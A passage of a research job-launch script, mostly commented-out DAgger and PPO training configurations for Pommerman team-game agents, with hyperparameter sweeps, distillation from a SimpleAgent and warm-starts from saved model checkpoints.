# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# ### These are trying to dagger train an agent in a TeamRandom game.
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 50, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 50, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "loldag"
# )
# ### These are like the above but don't use the value loss.
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 25, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 25, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "lolexuvl", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmall",
# }, "lolexuvl"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.001, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "loldag", "how-train": "dagger", "num-episodes-dagger": 20, "log-interval": 50,
# "minibatch-size": 275, "save-interval": 50, "lr": 0.001, "num-steps-eval": 100, "use-value-loss": "",
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# }, "loldag"
# )
### These are ppo jobs where we "distill" the 1hot Simple Agent into the PPO Agent.
# train_ppo_job( # This job will have batch size of 800
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 200,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 200
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 300
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 150,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 150
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 150,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 200,
# "distill-expert": "SimpleAgent"
# }, "pmanDSSimp"
# )
### These are the same as above, but with a longer distill-epochs
# train_ppo_job( # This job will have batch size of 800
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 200,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 200
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 300
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 150,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 150
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "num-steps": 150,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
# train_ppo_job( # This job will have batch size of 400
# {"num-processes": 8, "run-name": "gma99", "how-train": "simple", "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".99", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 4, "num-steps": 200,
# "distill-expert": "SimpleAgent", "distill-epochs": 5000,
# }, "pmanDSSimp"
# )
### These are meant to keep going on one of the earlier models that seemed to hit a wall wrt LR.
# train_dagger_job(
# {"num-processes": 8, "run-name": "cont", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 25,
# "minibatch-size": 2000, "save-interval": 25, "lr": 0.001, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# "use-value-loss": "", "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-dagg-gma995.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb2000.ne15.prob0.5.nopt1.epoch290.steps232800.seed1.pt"
# }
# )
# train_dagger_job(
# {"num-processes": 8, "run-name": "cont", "how-train": "dagger", "num-episodes-dagger": 15, "log-interval": 25,
# "minibatch-size": 2000, "save-interval": 25, "lr": 0.0005, "num-steps-eval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "expert-prob": 0.5, "model-str": "PommeCNNPolicySmaller",
# "use-value-loss": "", "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-dagg-gma995.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb2000.ne15.prob0.5.nopt1.epoch290.steps232800.seed1.pt"
# }
# )
### These are meant to see if we can distill the 1hot Simple Agent into the PPO while playing Team. These all have a bigger batch size.
### These did not work but did pose some questions. Namely, the 3e-4 learning rate ones
### seem to be learning something. We are going to try increasing the KL factor a hell of a lot
### and seeing if that helps.
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "a", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.001,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
### These try to adjust for what we learned above with an attempt to bump up the KL.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0005, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "b", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0005, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmanDSS"
# )
### These are the same as above (modulo the lr) but repeated now that we have the new team reward in place.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000, "use-gae": "",
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# }, "pmancoop"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "coop", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmall", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# }, "pmancoop"
# )
### These are again trying to initialize from a dagger trained agent.
###
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# ### These are like the above but additionally distill from SimpleAgent
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "initexuvl", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000, "use-gae": "",
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 400
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
# "saved-paths": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/agent0-dagger-lolexuvl.dagger.PommeTeamShort-v0.PommeCNNPolicySmaller.nc256.lr0.005.mb275.ne25.prob0.5.nopt1.epoch900.steps720800.seed1.pt"
# }, "pmaninit"
# )
# train_ppo_job( # Batch size of 800
# {"num-processes": 8, "run-name": "init", "how-train": "simple", "num-steps": 200, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003, "init-kl-factor": 10.0,
# "model-str": "PommeCNNPolicySmaller", "num-mini-batch": 2, "half-lr-epochs": 5000,
# "distill-expert": "SimpleAgent", "distill-epochs": 10000,
